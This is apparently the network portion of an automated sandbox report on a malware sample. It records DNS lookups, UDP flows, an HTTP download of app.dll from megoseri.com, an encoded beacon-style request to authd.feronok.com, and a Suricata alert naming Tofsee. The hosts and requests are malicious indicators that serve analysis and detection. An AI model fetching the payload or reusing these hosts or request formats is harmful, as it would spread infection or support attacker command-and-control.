Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
authd.feronok.com | 35.199.86.111 | |
megoseri.com | 146.0.72.81 | |
UDP Requests
Source | Destination |
---|---|
192.168.56.101:59369 | 164.124.101.2:53 |
192.168.56.101:61479 | 164.124.101.2:53 |
192.168.56.101:62324 | 164.124.101.2:53 |
192.168.56.101:137 | 192.168.56.255:137 |
192.168.56.101:138 | 192.168.56.255:138 |
192.168.56.101:49152 | 239.255.255.250:3702 |
192.168.56.101:62325 | 239.255.255.250:3702 |
192.168.56.101:62445 | 239.255.255.250:1900 |
192.168.56.101:62447 | 239.255.255.250:3702 |
192.168.56.101:62449 | 239.255.255.250:3702 |
52.231.114.183:123 | 192.168.56.101:123 |
8.8.8.8:53 | 192.168.56.101:59369 |
HTTP Requests
GET 200 https://megoseri.com/app.dll
Request:
GET /app.dll HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: megoseri.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Jun 2021 08:18:11 GMT
Content-Type: application/x-msdos-program
Content-Length: 698368
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Mon, 31 May 2021 13:16:47 GMT
ETag: "aa800-5c3a009a49a37"
Accept-Ranges: bytes
GET 404 http://authd.feronok.com/Y_2Bxq_2FCq_2/F7MtFfN9/OaOiUxVKaMBar_2Bwadu9JI/5f2JIT1R6z/wqyp5OYH26_2FCxoz/4cOT1gafxSEk/1G5XsW988_2/BjdSRlF7L4UAwI/jcsnuDJ33Fm5LZiPOHvvA/PAjjFqU39DDThmrZ/eR22M_2Fe0ePvSa/5l4TtOyHif5dcS9VgY/EtNp35w6x/i4xoaI04WasHjLAOvTF6/tc4VmpY6u_2F8heA9cW/KMPn27BMSv_2B3g7Hp4Ztp/SRUmhDBdfjn5m/rRGd_2Bb/Kx_2FAWnV71TDHDIMbMeb_2/BNfwSQhYk9/_2Fu_2BOoxOVDOIkf/D2gC2K1i
Request:
GET /Y_2Bxq_2FCq_2/F7MtFfN9/OaOiUxVKaMBar_2Bwadu9JI/5f2JIT1R6z/wqyp5OYH26_2FCxoz/4cOT1gafxSEk/1G5XsW988_2/BjdSRlF7L4UAwI/jcsnuDJ33Fm5LZiPOHvvA/PAjjFqU39DDThmrZ/eR22M_2Fe0ePvSa/5l4TtOyHif5dcS9VgY/EtNp35w6x/i4xoaI04WasHjLAOvTF6/tc4VmpY6u_2F8heA9cW/KMPn27BMSv_2B3g7Hp4Ztp/SRUmhDBdfjn5m/rRGd_2Bb/Kx_2FAWnV71TDHDIMbMeb_2/BNfwSQhYk9/_2Fu_2BOoxOVDOIkf/D2gC2K1i HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: authd.feronok.com
Connection: Keep-Alive
Response:
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 01 Jun 2021 08:19:48 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49204 -> 146.0.72.81:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49204 146.0.72.81:443 | C=US, O=Let's Encrypt, CN=R3 | CN=megoseri.com | a1:e6:eb:af:ab:3b:16:6b:5b:f9:03:bb:de:b0:1a:99:e1:32:43:f5 |
Snort Alerts
No Snort Alerts